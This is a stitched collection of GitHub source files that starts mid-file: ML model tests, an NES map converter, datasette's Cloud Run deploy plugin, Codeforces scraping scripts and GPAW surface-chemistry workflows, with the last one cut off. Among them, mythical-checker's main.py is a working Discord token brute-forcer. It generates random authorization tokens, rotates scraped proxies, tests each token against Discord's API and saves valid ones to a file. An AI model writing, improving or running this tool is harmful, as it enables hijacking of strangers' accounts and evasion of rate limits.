    print("[INFO]: Deleting HDF5 file.")
    os.remove(hdf5_path)
    print('\n [INFO]: Test of HeMIS passed successfully.')
|
nekohayo/ivadomed | testing/unit_tests/test_model.py | <reponame>nekohayo/ivadomed
import ivadomed.models as imed_model
import torch
import torchvision
# testing countception model
def test_countception():
    """Smoke-test Countception: a 1x1x10x10 zero input must yield a Tensor."""
    inp = torch.zeros(1, 1, 10, 10)  # replaces the nested-list construction
    model = imed_model.Countception(in_channel=1, out_channel=1)
    inf = model(inp)
    assert isinstance(inf, torch.Tensor)
def test_model_3d_att():
    """Verify the 3D attention U-Net can be created and run on a 1x1x16x48x48 zero input."""
    inp = torch.zeros(1, 1, 16, 48, 48)  # replaces the nested-list construction
    model = imed_model.Modified3DUNet(in_channel=1, out_channel=1, attention=True)
    inf = model(inp)
    assert isinstance(inf, torch.Tensor)
def test_resnet():
    """Smoke-test the ResNet wrapper (BasicBlock, 2-2-2-2 layout) on a zero input."""
    inp = torch.zeros(1, 1, 100, 100)  # replaces the nested-list construction
    model = imed_model.ResNet(torchvision.models.resnet.BasicBlock, [2, 2, 2, 2])
    inf = model(inp)
    assert isinstance(inf, torch.Tensor)
def test_densenet():
    """Smoke-test DenseNet (growth 32, blocks 6-12-24-16, 64 init features) on a zero input."""
    inp = torch.zeros(1, 1, 100, 100)  # replaces the nested-list construction
    model = imed_model.DenseNet(32, (6, 12, 24, 16), 64)
    inf = model(inp)
    assert isinstance(inf, torch.Tensor)
def test_filmed_unet():
    """Smoke-test FiLMedUnet with default parameters on a 1x1x100x100 zero input."""
    inp = torch.zeros(1, 1, 100, 100)  # replaces the nested-list construction
    model = imed_model.FiLMedUnet()
    inf = model(inp)
    assert isinstance(inf, torch.Tensor)
def test_film_generator():
    """Smoke-test FiLMgenerator: returns a (Tensor, Parameter) pair on a zero input."""
    inp = torch.zeros(1, 1, 64, 64)  # replaces the nested-list construction
    model = imed_model.FiLMgenerator(64, 1)
    inf = model(inp)
    assert isinstance(inf[0], torch.Tensor)
    assert isinstance(inf[1], torch.nn.parameter.Parameter)
|
atenorio3/TouchOfLight | BG/CSV2C.py | <filename>BG/CSV2C.py
#!/usr/bin/python3
# written by <NAME> 2018
# this program takes csv output from Tiled
# and turns it into a C style array that can be included
# NES programming...cc65
import sys
import csv
import os
filename = sys.argv[1]
# Output .c file sits next to the input; array name is the base name
# of the input without its extension.
newname = filename[0:-4] + ".c"
newname2 = os.path.basename(filename)
newname2 = newname2[0:-4]

with open(filename, 'r') as oldfile:
    reader = csv.reader(oldfile)
    your_list = list(reader)

# warning, this may overwrite an old .c file !!!!!!!!!!!!!!!!!!!!!
with open(newname, 'w') as newfile:
    newfile.write("const unsigned char " + newname2 + "[]={\n")
    # One CSV row per output line, rows joined with ",\n" so there is no
    # comma after the very last value.  This replaces the original
    # seek(tell()-3) hack, which is undefined behavior on text-mode files
    # and ate the final digit on platforms where '\n' is a single byte.
    newfile.write(",\n".join(",".join(row) for row in your_list))
    newfile.write("\n};\n\n")

print("Done.")
# Both files are closed by the `with` blocks above; the original ended with
# `oldfile.close` / `newfile.close` (missing parentheses), which never ran.
|
chris48s/datasette | datasette/publish/cloudrun.py | <reponame>chris48s/datasette
from datasette import hookimpl
import click
import json
import os
from subprocess import check_call, check_output
from .common import (
add_common_publish_arguments_and_options,
fail_if_publish_binary_not_installed,
)
from ..utils import temporary_docker_directory
@hookimpl
def publish_subcommand(publish):
    """Register the ``datasette publish cloudrun`` subcommand on the publish group.

    Builds a Docker image with Cloud Build and deploys it to Google Cloud Run.
    Requires the ``gcloud`` CLI to be installed and configured.
    """
    @publish.command()
    @add_common_publish_arguments_and_options
    @click.option(
        "-n",
        "--name",
        default="datasette",
        help="Application name to use when building",
    )
    @click.option(
        "--service", default="", help="Cloud Run service to deploy (or over-write)"
    )
    @click.option("--spatialite", is_flag=True, help="Enable SpatialLite extension")
    @click.option(
        "--show-files",
        is_flag=True,
        help="Output the generated Dockerfile and metadata.json",
    )
    def cloudrun(
        files,
        metadata,
        extra_options,
        branch,
        template_dir,
        plugins_dir,
        static,
        install,
        plugin_secret,
        version_note,
        title,
        license,
        license_url,
        source,
        source_url,
        about,
        about_url,
        name,
        service,
        spatialite,
        show_files,
    ):
        # No docstring on purpose: click would surface it as --help text and
        # change the CLI's output.
        fail_if_publish_binary_not_installed(
            "gcloud", "Google Cloud", "https://cloud.google.com/sdk/"
        )
        # Deploy into whichever project `gcloud config` currently points at.
        project = check_output(
            "gcloud config get-value project", shell=True, universal_newlines=True
        ).strip()
        extra_metadata = {
            "title": title,
            "license": license,
            "license_url": license_url,
            "source": source,
            "source_url": source_url,
            "about": about,
            "about_url": about_url,
        }
        environment_variables = {}
        if plugin_secret:
            # Route each (plugin, setting, value) triple through an env var so
            # the secret value itself never lands in metadata.json.
            extra_metadata["plugins"] = {}
            for plugin_name, plugin_setting, setting_value in plugin_secret:
                environment_variable = (
                    "{}_{}".format(plugin_name, plugin_setting)
                    .upper()
                    .replace("-", "_")
                )
                environment_variables[environment_variable] = setting_value
                extra_metadata["plugins"].setdefault(plugin_name, {})[
                    plugin_setting
                ] = {"$env": environment_variable}
        with temporary_docker_directory(
            files,
            name,
            metadata,
            extra_options,
            branch,
            template_dir,
            plugins_dir,
            static,
            install,
            spatialite,
            version_note,
            extra_metadata,
            environment_variables,
        ):
            if show_files:
                if os.path.exists("metadata.json"):
                    print("=== metadata.json ===\n")
                    print(open("metadata.json").read())
                print("\n==== Dockerfile ====\n")
                print(open("Dockerfile").read())
                print("\n====================\n")
            image_id = "gcr.io/{project}/{name}".format(project=project, name=name)
            # Build remotely via Cloud Build, then deploy the image to Cloud Run.
            # `service`, when given, is passed as the positional SERVICE argument.
            check_call("gcloud builds submit --tag {}".format(image_id), shell=True)
            check_call(
                "gcloud beta run deploy --allow-unauthenticated --platform=managed --image {}{}".format(
                    image_id, " {}".format(service) if service else ""
                ),
                shell=True,
            )
|
sxvnlol/mythical-checker | main.py | <filename>main.py
import random
import string
import os
import requests
from itertools import cycle
import base64
from random import randint
from lxml.html import fromstring
import requests
import traceback
from colorama import init, Fore as cc
from os import system, name
from time import sleep
init()
# Colorama foreground shorthands (lower- and upper-case aliases of each colour).
dr = DR = r = R = cc.LIGHTRED_EX
g = G = cc.LIGHTGREEN_EX
b = B = cc.LIGHTBLUE_EX
m = M = cc.LIGHTMAGENTA_EX
c = C = cc.LIGHTCYAN_EX
y = Y = cc.LIGHTYELLOW_EX
w = W = cc.RESET  # reset back to the default terminal colour
banner = f'''
{w}███{b}╗{w} ███{b}╗{w}██{b}╗{w} ██{b}╗{w}████████{b}╗{w}██{b}╗{w} ██{b}╗{w}██{b}╗{w} ██████{b}╗{w} █████{b}╗{w} ██{b}╗{w}
████{b}╗{w} ████{b}║{w}{b}╚{w}██{b}╗{w} ██{b}╔{w}{b}╝{w}{b}╚{w}{b}═{w}{b}═{w}██{b}╔{w}{b}═{w}{b}═{w}{b}╝{w}██{b}║{w} ██{b}║{w}██{b}║{w}██{b}╔{w}{b}═{w}{b}═{w}{b}═{w}{b}═{w}{b}╝{w}██{b}╔{w}{b}═{w}{b}═{w}██{b}╗{w}██{b}║{w}
██{b}╔{w}████{b}╔{w}██{b}║{w} {b}╚{w}████{b}╔{w}{b}╝{w} ██{b}║{w} ███████{b}║{w}██{b}║{w}██{b}║{w} ███████{b}║{w}██{b}║{w}
██{b}║{w}{b}╚{w}██{b}╔{w}{b}╝{w}██{b}║{w} {b}╚{w}██{b}╔{w}{b}╝{w} ██{b}║{w} ██{b}╔{w}{b}═{w}{b}═{w}██{b}║{w}██{b}║{w}██{b}║{w} ██{b}╔{w}{b}═{w}{b}═{w}██{b}║{w}██{b}║{w}
██{b}║{w} {b}╚{w}{b}═{w}{b}╝{w} ██{b}║{w} ██{b}║{w} ██{b}║{w} ██{b}║{w} ██{b}║{w}██{b}║{w}{b}╚{w}██████{b}╗{w}██{b}║{w} ██{b}║{w}███████{b}╗{w}
{b}╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝{w}
{m}Made by: sxvn#1337 {w} '''
# Directory containing this script; valid tokens are appended to tokens.txt here.
current_path = os.path.dirname(os.path.realpath(__file__))
# Endpoint used to probe a token: the main loop treats HTTP 200 as "valid".
url = "https://discordapp.com/api/v6/users/@me/library"
count = 0  # tokens printed since the screen was last cleared
def clear():
    """Clear the terminal: 'cls' on Windows ('nt'), 'clear' elsewhere."""
    command = 'cls' if name == 'nt' else 'clear'
    _ = system(command)
clear()
def get_proxies():
    """Scrape up to 10 HTTPS-capable proxies ("ip:port" strings) from sslproxies.org."""
    response = requests.get('https://sslproxies.org/')
    parser = fromstring(response.text)
    proxies = set()
    for row in parser.xpath('//tbody/tr')[:10]:
        # Column 7 says "yes" for proxies that support HTTPS; skip the rest.
        if not row.xpath('.//td[7][contains(text(),"yes")]'):
            continue
        ip = row.xpath('.//td[1]/text()')[0]
        port = row.xpath('.//td[2]/text()')[0]
        proxies.add(ip + ":" + port)
    return proxies
print(banner)
# Main loop: forge one random token per pass, probe it through a rotating
# proxy, and record valid hits in tokens.txt.
while True:
    tokens = []
    # Token shape: base64(18-digit id) + "." + 6-char part + "." + 27-char part.
    # Regenerate the id until its base64 form carries no "==" padding.
    base64_string = "=="
    while base64_string.find("==") != -1:
        sample_string = str(randint(0, 999999999999999999))
        sample_string_bytes = sample_string.encode("ascii")
        base64_bytes = base64.b64encode(sample_string_bytes)
        base64_string = base64_bytes.decode("ascii")
    token = (base64_string + "."
             + random.choice(string.ascii_letters).upper()
             + ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(5))
             + "."
             + ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(27)))
    tokens.append(token)
    proxies = get_proxies()
    proxy_pool = cycle(proxies)
    for token in tokens:
        proxy = next(proxy_pool)
        header = {
            "Content-Type": "application/json",
            "authorization": token
        }
        r = requests.get(url, headers=header, proxies={"http": proxy})
        if r.status_code == 200:
            # BUG FIX: a single `status` variable is set on every branch; the
            # original set `lmao` here, so printing `status` below raised
            # NameError on the first valid/rate-limited token.
            status = u"\u001b[32;1m[+] Valid Token\u001b[0m"
            # BUG FIX: was open(current_path+"/"+tokens.txt) -- attribute
            # access on a list, and read mode; append the hit and close it.
            with open(current_path + "/" + "tokens.txt", "a") as f:
                f.write(token + "\n")
        elif "rate limited." in r.text:
            status = "\u001b[-] You are being rate limited\u001b[0m"
        else:
            status = u"\u001b[31m[-] Invalid:\u001b[0m"
        print(status + " " + token)
        count = count + 1
        # Redraw the banner every 4 results to keep the screen tidy.
        if count == 4:
            sleep(0.2)
            clear()
            print(banner)
            count = 0
    # (the original removed the token from `tokens` while iterating over it;
    # with a fresh single-token list each pass that mutation is unnecessary)
|
akoprow/codeforces-editorials | scripts/leaderboard.py | <reponame>akoprow/codeforces-editorials<gh_stars>0
#!/usr/bin/python3
import requests
import sys
from collections import defaultdict
from datetime import datetime
from tqdm import tqdm
def main():
    """Print a CSV (handle,rating,country,city,solved) for all active rated Codeforces users."""

    def problem_key(submission):
        # Unique-ish key for a problem: its name plus the contest id when present.
        # BUG FIX: the original helper (named `id`, shadowing the builtin) had
        # no `return`, so every key was None and each user's distinct-solved
        # count collapsed to at most 1.
        problem = submission['problem']
        suffix = str(problem['contestId']) if 'contestId' in problem else ''
        return problem['name'] + suffix

    url = 'https://codeforces.com/api/user.ratedList?activeOnly=true'
    r = requests.get(url)
    users = r.json()['result']
    print('handle,rating,country,city,solved')
    for user in tqdm(users):
        handle = user['handle']
        rating = user['rating']
        country = user.get('country', '')
        city = user.get('city', '')
        r = requests.get(f'https://codeforces.com/api/user.status?handle={handle}')
        submissions = r.json()['result']
        solved = {problem_key(s) for s in submissions if s['verdict'] == 'OK'}
        print(f"{handle}, {rating}, {country}, {city}, {len(solved)}")


if __name__ == "__main__":
    main()
|
akoprow/codeforces-editorials | scripts/stats.py | #!/usr/bin/python3
import requests
import sys
from collections import defaultdict
from datetime import datetime
def generate(label):
    """Print problem counts (total vs. tagged with `label`) grouped by rating and by contest year."""
    # Map contest id -> calendar year the contest started.
    contests = requests.get('https://codeforces.com/api/contest.list').json()['result']
    contestYear = {}
    for contest in contests:
        contestYear[contest['id']] = datetime.fromtimestamp(contest['startTimeSeconds']).year
    problems = requests.get('https://codeforces.com/api/problemset.problems').json()['result']['problems']
    yearAll = defaultdict(int)
    yearLabel = defaultdict(int)
    ratingAll = defaultdict(int)
    ratingLabel = defaultdict(int)
    for problem in problems:
        tagged = label in problem['tags']
        year = contestYear[problem['contestId']]
        yearAll[year] += 1
        if tagged:
            yearLabel[year] += 1
        # Not every problem carries a rating; skip the rating buckets when absent.
        if 'rating' in problem:
            rating = problem['rating']
            ratingAll[rating] += 1
            if tagged:
                ratingLabel[rating] += 1
    print('By rating')
    for rating in sorted(ratingAll):
        print(f'{rating},{ratingAll[rating]},{ratingLabel[rating]}')
    print('By year')
    for year in sorted(yearAll):
        print(f'{year},{yearAll[year]},{yearLabel[year]}')
def main():
    """CLI entry point: expects exactly one argument, the tag to analyse."""
    if len(sys.argv) != 2:
        print(f'Usage: {sys.argv[0]} <LABEL>')
        exit(0)
    generate(sys.argv[1])


if __name__ == "__main__":
    main()
main()
|
akoprow/codeforces-editorials | scripts/gen.py | <filename>scripts/gen.py
#!/usr/bin/python3
import requests
import sys
from datetime import datetime
def generate(contestId, abbrev, shortName):
    """Scaffold editorial files for one Codeforces contest.

    Appends (never overwrites): the regeneration command to scripts/genall.sh,
    a dated Jekyll post under _posts/, one stub include per problem under
    _includes/p/, and the problems' metadata entries to _data/problems.yaml.
    """
    url = f'https://codeforces.com/api/contest.standings?contestId={contestId}&from=1&count=1&showUnofficial=false'
    print(f'Fetching: {url}')
    r = requests.get(url)
    data = r.json()['result']
    title = data['contest']['name']
    start = datetime.fromtimestamp(data['contest']['startTimeSeconds'])
    print(f'Contest: <{title}>')
    # Record the command used, so the whole site can be regenerated later.
    with open('scripts/genall.sh', 'a') as f:
        print(f'./gen.py {contestId} {abbrev} "{shortName}"', file=f)
    # Jekyll post named after the contest's start date.
    with open(f'_posts/{start.strftime("%Y-%m-%d")}-{abbrev}.md', 'a') as f:
        print('---', file=f)
        print(f'title: {shortName}', file=f)
        print('---', file=f)
        print('', file=f)
        print(f'[{title}](https://codeforces.com/contest/{contestId})', file=f)
        print(file=f)
        for problem in data['problems']:
            index = problem['index']
            name = problem['name']
            tags = ', '.join(problem['tags'])
            rating = problem.get('rating', None)
            # note: name/tags/rating are computed but unused in this loop
            print(f'{{% include problem.md id="{contestId}{index}" %}}', file=f)
            # Per-problem stub; the first 3 digits of the contest id bucket the dir.
            fn = f'p/{contestId[0:3]}/{contestId}{index}.md'
            with open(f'_includes/{fn}', 'a') as p:
                print(f'```', file=p)
                print(f'TODO', file=p)
                print(f'```', file=p)
            print(file=f)
        print('* * *', file=f)
        print(file=f)
        print(f"<object data='notes/{abbrev}.pdf' width='1000' height='1000' type='application/pdf'/>", file=f)
    # YAML index consumed by the site's problem tables.
    with open('_data/problems.yaml', 'a') as f:
        for problem in data['problems']:
            index = problem['index']
            name = problem['name']
            labels = ', '.join(problem['tags'])
            rating = problem.get('rating', None)
            print(f'- id: "{contestId}{index}"', file=f)
            print(f'  title: "{name}"', file=f)
            print(f'  labels: "{labels}"', file=f)
            if rating:
                print(f'  rating: {rating}', file=f)
            print(file=f)
def main():
    """CLI entry point: <CONTEST_ID> <ABBREV> <SHORT_NAME>."""
    if len(sys.argv) != 4:
        print(f'Usage: {sys.argv[0]} <CONTEST_ID> <ABBREV> <SHORT_NAME>')
        exit(0)
    contestId, abbrev, shortName = sys.argv[1:4]
    print(f'Loading contest {contestId} (abbrev: {abbrev}, short name: {shortName})')
    generate(contestId, abbrev, shortName)


if __name__ == "__main__":
    main()
|
akoprow/codeforces-editorials | scripts/index.py | <filename>scripts/index.py
#!/usr/bin/python3
import re
from pathlib import Path
from tqdm import tqdm
def main():
    """Print YAML index entries parsed from the first line of every problem include file."""
    files = sorted(Path('_includes/p').rglob('*.md'))
    for path in tqdm(files):
        with open(path, 'rt') as f:
            ex = f.readlines()[0]
        # The problem id comes from the path; the rest from the include header line.
        id = re.search(r"_includes/p/\d+/(.+)\.md", str(path))
        if not id:
            raise Exception(f'Unknown id for file: {path}')
        name = re.search(r'name="([^"]+)"', ex)
        if not name:
            raise Exception(f'Unknown name in: {ex}')
        rating = re.search(r'rating=(\d+)', ex)
        labels = re.search(r'labels="([^"]+)"', ex)
        if not labels:
            raise Exception(f'Unknown labels in: {ex}')
        code = re.search(r'code="([^"]+)"', ex)
        entry = [f'- id: "{id.group(1)}"',
                 f'  title: "{name.group(1)}"',
                 f'  labels: "{labels.group(1)}"']
        if rating:
            entry.append(f'  rating: {rating.group(1)}')
        if code:
            entry.append(f'  code: "{code.group(1)}"')
        for line in entry:
            print(line)
        print()


if __name__ == "__main__":
    main()
|
akoprow/codeforces-editorials | scripts/addRatings.py | #!/usr/bin/python3
import requests
import sys
def generate(contestId):
    """Append a `rating=<value>` line to each problem include file of the given contest.

    Problems without a rating get the literal line `rating=None`.
    """
    url = f'https://codeforces.com/api/contest.standings?contestId={contestId}&from=1&count=1&showUnofficial=false'
    print(f'Fetching: {url}')
    r = requests.get(url)
    data = r.json()['result']
    title = data['contest']['name']
    print(f'Contest: <{title}>')
    for problem in data['problems']:
        index = problem['index']
        rating = problem.get('rating', None)
        # Context manager guarantees the file is closed even if the write
        # fails (the original paired open()/close() by hand); the first 3
        # digits of the contest id bucket the directory.
        with open(f'_includes/p/{contestId[0:3]}/{contestId}{index}.md', 'a') as p:
            print(f'rating={rating}', file=p)
def main():
    """CLI entry point: expects a single contest id argument."""
    if len(sys.argv) != 2:
        print(f'Usage: {sys.argv[0]} <CONTEST_ID>')
        exit(0)
    contestId = sys.argv[1]
    print(f'Loading contest {contestId}')
    generate(contestId)


if __name__ == "__main__":
    main()
|
kianpu34593/base4gpaw | BASIC/ads_selector.py | from gpaw import GPAW,Mixer,MixerDif,Davidson
import glob
import BASIC.optimizer as opt
import numpy as np
from ase.parallel import parprint,world,paropen
import os
from ase.db import connect
import sys
from ase.calculators.calculator import kptdensity2monkhorstpack as kdens2mp
from ase.io import read,write
def ads_auto_select(element,
                    struc,
                    gpaw_calc,
                    ads,
                    ads_pot_e,
                    solver_fmax=0.01,
                    solver_maxstep=0.04,
                    temp_print=True,
                    size='1x1'):
    """Relax every candidate adsorption slab for element(struc) and store the best one.

    For each pre-built adsorbate trajectory under <element>/ads/<struc>, the
    slab is relaxed with ``gpaw_calc`` and its adsorption energy computed as
    E(ads slab) - (E(clean slab) + ads_pot_e).  The lowest-energy site is
    written to final_database/ads<size>.db and progress is logged to a
    per-structure report file.

    Fixes versus the previous revision: `fiile=f` typo (raised TypeError when
    the aspect-ratio warning fired) and redundant f.close() calls after `with`
    blocks removed.
    """
    #convert str ind to tuple
    m_ind=tuple(map(int,struc))
    #set up the workspace
    code_dir=os.getcwd() #get the current working dir
    #create report
    rep_location=code_dir+'/'+element+'/'+'ads'+'/'+struc+'_results_report.txt'
    # only one MPI rank removes the stale report
    if world.rank==0 and os.path.isfile(rep_location):
        os.remove(rep_location)
    #connect to the surface database to get the parameters for calculation
    opt_slab=connect('final_database'+'/'+'surf.db').get_atoms(name=element+'('+struc+')')
    calc_dict=gpaw_calc.__dict__['parameters']
    if calc_dict['spinpol']:
        magmom=opt_slab.get_magnetic_moments()
    with paropen(rep_location,'a') as f:
        parprint('Initial Parameters:',file=f)
        parprint('\t'+'Materials: '+element,file=f)
        parprint('\t'+'Miller Index: '+str(m_ind),file=f)
        parprint('\t'+'Adsorbate: '+str(ads),file=f)
        parprint('\t'+'xc: '+calc_dict['xc'],file=f)
        parprint('\t'+'h: '+str(calc_dict['h']),file=f)
        parprint('\t'+'kpts: '+str(calc_dict['kpts']),file=f)
        parprint('\t'+'sw: '+str(calc_dict['occupations']),file=f)
        parprint('\t'+'spin polarized: '+str(calc_dict['spinpol']),file=f)
        if calc_dict['spinpol']:
            parprint('\t'+'init_magmom: '+str(magmom),file=f)
    ads_file_loc=code_dir+'/'+element+'/'+'ads'+'/'+struc
    fils=glob.glob(ads_file_loc+'/'+'adsorbates/Li/**/**/*.traj',recursive=False)
    ads_dict={}
    with paropen(rep_location,'a') as f:
        parprint('Ads Site(Ang)\t\t\tAds Energy(eV)',file=f)
    for file_loc in fils:
        ads_slab=read(file_loc)
        # kpts=kdens2mp(ads_slab,kptdensity=k_density,even=True)
        slab_length=ads_slab.cell.lengths()
        slab_long_short_ratio=max(slab_length)/min(slab_length)
        if calc_dict['spinpol']:
            # seed magmoms from the clean slab, one extra site for the
            # adsorbate, then zero the adsorbate atom itself
            slab_formula=ads_slab.get_chemical_symbols()
            magmom_ls=np.append(magmom,np.mean(magmom))
            magmom_ls[slab_formula.index(ads)]=0
            ads_slab.set_initial_magnetic_moments(magmom_ls)
        if slab_long_short_ratio > 15:
            with paropen(rep_location,'a') as f:
                parprint('WARNING: slab long-short side ratio is'+str(slab_long_short_ratio),file=f)
                # BUG FIX: was `fiile=f`, which raised TypeError whenever this branch ran
                parprint('Consider change the mixer setting, if not converged.',file=f)
        ads_slab.set_calculator(gpaw_calc)
        location='/'.join(file_loc.split('/')[:-1])
        opt.surf_relax(ads_slab, location, fmax=solver_fmax, maxstep=solver_maxstep, replay_traj=None)
        # adsorption energy relative to clean slab + isolated adsorbate
        ads_dict[location]=ads_slab.get_potential_energy()-(opt_slab.get_potential_energy()+ads_pot_e)
        if temp_print:
            with paropen(rep_location,'a') as f:
                parprint(str(file_loc.split('/')[-2])+'\t\t\t'+str(np.round(ads_dict[location],decimals=5)),file=f)
    # sites sorted by adsorption energy, lowest first
    ads_dict_sorted=sorted(ads_dict,key=ads_dict.get)
    lowest_ads_e_slab=read(ads_dict_sorted[0]+'/slab.traj')
    ads_db=connect('final_database/ads'+str(size)+'.db')
    # reserve() returns None when the row already exists -> update in place
    id=ads_db.reserve(name=element+'('+struc+')')
    if id is None:
        id=ads_db.get(name=element+'('+struc+')').id
        ads_db.update(id=id,atoms=lowest_ads_e_slab,name=element+'('+struc+')',clean_slab_pot_e=opt_slab.get_potential_energy(),ads_pot_e=ads_dict[ads_dict_sorted[0]])
    else:
        ads_db.write(lowest_ads_e_slab,id=id,name=element+'('+struc+')',clean_slab_pot_e=opt_slab.get_potential_energy(),ads_pot_e=ads_dict[ads_dict_sorted[0]])
    with paropen(rep_location,'a') as f:
        parprint('Computation Complete. Selected ads site is: '+ads_dict_sorted[0].split('/')[-1],file=f)
kianpu34593/base4gpaw | tutorial/Cu_ads.py | from actgpaw import ads_selector
from gpaw import GPAW, MixerSum, Mixer, MixerDif, Davidson
from ase.db import connect
# Driver script: pick the best Li adsorption site on Cu(111) with actgpaw.
# specify the material and miller index of interest
element = "Cu_mp-30"
struc = "111"
# read the optimized conventional cell in the database
element_surf = connect("final_database/surf.db").get(name=element + "(" + struc + ")")
# reuse the converged numerical settings stored with the surface entry
h = element_surf.h
xc = element_surf.xc
sw = element_surf.sw
spin = element_surf.spin
kpts = [int(i) for i in (element_surf.kpts).split(",")]
# set up the calculator
calc = GPAW(
    xc=xc,
    h=h,
    kpts=kpts,
    symmetry={"point_group": False},
    eigensolver=Davidson(3),
    mixer=Mixer(beta=0.05, nmaxold=5, weight=50),
    spinpol=spin,
    maxiter=333,
    occupations={"name": "fermi-dirac", "width": sw},
    poissonsolver={"dipolelayer": "xy"},  # dipole correction for the slab geometry
)
# call ads_selector module
ads_selector.ads_auto_select(
    element,
    struc,
    calc,
    ads="Li",  # specify adsorbate
    ads_pot_e=-1.89678,  # adsorbate energy
    size="1x1",  # specify the size of the supercell (xy)
    temp_print=True,  # print out the convergence process
)
|
kianpu34593/base4gpaw | BASIC/bulk_autoconv.py | from gpaw import GPAW,Mixer,Davidson
from ase.build import bulk
from ase.db import connect
import os
import BASIC.optimizer as opt
from ase.parallel import parprint
import numpy as np
import sys
from ase.io import read, write
from ase.parallel import paropen, parprint, world
from ase.calculators.calculator import kptdensity2monkhorstpack as kdens2mp
def bulk_auto_conv(element,gpaw_calc,
rela_tol=10*10**(-3),
init_magmom=0,
temp_print=True,
solver_step=0.05,
solver_fmax=0.01):
rep_location=(element+'/'+'bulk'+'/'+'results_report.txt')
calc_dict=gpaw_calc.__dict__['parameters']
#initialize the kpts from the k_density
orig_atom=bulk_builder(element)
if world.rank==0 and os.path.isfile(rep_location):
os.remove(rep_location)
with paropen(rep_location,'a') as f:
parprint('Initial Parameters:',file=f)
parprint('\t'+'Materials: '+element,file=f)
parprint('\t'+'Lattice constants: '+str(np.round(orig_atom.get_cell_lengths_and_angles()[:3],decimals=5))+'Ang',file=f)
parprint('\t'+'Lattice angles: '+str(np.round(orig_atom.get_cell_lengths_and_angles()[3:],decimals=5))+'Degree',file=f)
parprint('\t'+'xc: '+calc_dict['xc'],file=f)
parprint('\t'+'h: '+str(calc_dict['h']),file=f)
parprint('\t'+'kpts: '+str(calc_dict['kpts']),file=f)
parprint('\t'+'sw: '+str(calc_dict['occupations']),file=f)
parprint('\t'+'spin polarized: '+str(calc_dict['spinpol']),file=f)
if calc_dict['spinpol']:
parprint('\t'+'magmom: '+str(init_magmom),file=f)
parprint('\t'+'rela_tol: '+str(rela_tol)+'eV',file=f)
f.close()
#connecting to databse
db_h=connect(element+"/"+'bulk'+'/'+'grid_converge.db')
db_k=connect(element+"/"+'bulk'+'/'+'kpts_converge.db')
db_sw=connect(element+"/"+'bulk'+'/'+'sw_converge.db')
db_final=connect('final_database'+'/'+'bulk.db')
diff_primary=100
diff_second=100
grid_iters=len(db_h)
h_ls=[]
if grid_iters>=2:
for i in range(2,grid_iters):
fst=db_h.get_atoms(id=i-1)
snd=db_h.get_atoms(id=i)
trd=db_h.get_atoms(id=i+1)
diff_primary=max(abs(snd.get_potential_energy()-fst.get_potential_energy()),
abs(trd.get_potential_energy()-fst.get_potential_energy()))
diff_second=abs(trd.get_potential_energy()-snd.get_potential_energy())
if temp_print == True:
temp_output_printer(db_h,i,'h',rep_location)
if grid_iters>0:
for j in range(1,grid_iters+1):
h_ls.append(db_h.get(j).h)
#start with grid spacing convergence
while (diff_primary>rela_tol or diff_second>rela_tol) and grid_iters <= 6:
atoms=bulk_builder(element)
if calc_dict['spinpol']:
atoms.set_initial_magnetic_moments(init_magmom*np.ones(len(atoms)))
atoms.set_calculator(gpaw_calc)
opt.optimize_bulk(atoms,step=solver_step,fmax=solver_fmax,location=element+"/"+'bulk'+'/'+'results_h',extname='{}'.format(calc_dict['h']))
db_h.write(atoms,h=calc_dict['h'])
if grid_iters>=2:
fst=db_h.get_atoms(id=grid_iters-1)
snd=db_h.get_atoms(id=grid_iters)
trd=db_h.get_atoms(id=grid_iters+1)
diff_primary=max(abs(snd.get_potential_energy()-fst.get_potential_energy()),
abs(trd.get_potential_energy()-fst.get_potential_energy()))
diff_second=abs(trd.get_potential_energy()-snd.get_potential_energy())
if temp_print == True:
temp_output_printer(db_h,grid_iters,'h',rep_location)
h_ls.append(calc_dict['h'])
gpaw_calc.__dict__['parameters']['h']=np.round(calc_dict['h']-0.02,decimals=2)
calc_dict=gpaw_calc.__dict__['parameters']
grid_iters+=1
if grid_iters>=6:
if diff_primary>rela_tol or diff_second>rela_tol:
with paropen(rep_location,'a') as f:
parprint("WARNING: Max GRID iterations reached! System may not be converged.",file=f)
parprint("Computation Suspended!",file=f)
f.close()
sys.exit()
h=h_ls[-3]
gpaw_calc.__dict__['parameters']['h']=h
calc_dict=gpaw_calc.__dict__['parameters']
#kpts convergence
diff_primary=100
diff_second=100
k_iters=len(db_k)+1
k_ls=[calc_dict['kpts']]
k_density=mp2kdens(db_h.get_atoms(len(db_h)-2),calc_dict['kpts'])
db_k.write(db_h.get_atoms(len(db_h)-2),k_density=','.join(map(str, k_density)),kpts=str(','.join(map(str, calc_dict['kpts']))))
while (diff_primary>rela_tol or diff_second>rela_tol) and k_iters <= 6:
atoms=bulk_builder(element)
kpts=[int(i+2) for i in calc_dict['kpts']]
k_density=mp2kdens(atoms,kpts)
gpaw_calc.__dict__['parameters']['kpts']=kpts
calc_dict=gpaw_calc.__dict__['parameters']
atoms=bulk_builder(element)
if calc_dict['spinpol']:
atoms.set_initial_magnetic_moments(init_magmom*np.ones(len(atoms)))
atoms.set_calculator(gpaw_calc)
opt.optimize_bulk(atoms,step=solver_step,fmax=solver_fmax,location=element+"/"+'bulk'+'/'+'results_k',extname='{}'.format(calc_dict['kpts'][0]))
db_k.write(atoms,k_density=','.join(map(str, k_density)),kpts=str(','.join(map(str, calc_dict['kpts']))))
if k_iters>=2:
fst=db_k.get_atoms(id=k_iters-1)
snd=db_k.get_atoms(id=k_iters)
trd=db_k.get_atoms(id=k_iters+1)
diff_primary=max(abs(snd.get_potential_energy()-fst.get_potential_energy()),
abs(trd.get_potential_energy()-fst.get_potential_energy()))
diff_second=abs(trd.get_potential_energy()-snd.get_potential_energy())
if temp_print == True:
temp_output_printer(db_k,k_iters,'kpts',rep_location)
k_iters+=1
k_ls.append(kpts)
if k_iters>=6:
if diff_primary>rela_tol or diff_second>rela_tol:
with paropen(rep_location,'a') as f:
parprint("WARNING: Max K_DENSITY iterations reached! System may not be converged.",file=f)
parprint("Computation Suspended!",file=f)
f.close()
sys.exit()
kpts=k_ls[-3]
gpaw_calc.__dict__['parameters']['kpts']=kpts
calc_dict=gpaw_calc.__dict__['parameters']
#smearing-width convergence test
diff_primary=100
diff_second=100
sw_iters=1
sw_ls=[calc_dict['occupations']['width']]
db_sw.write(db_k.get_atoms(len(db_k)-2),sw=calc_dict['occupations']['width'])
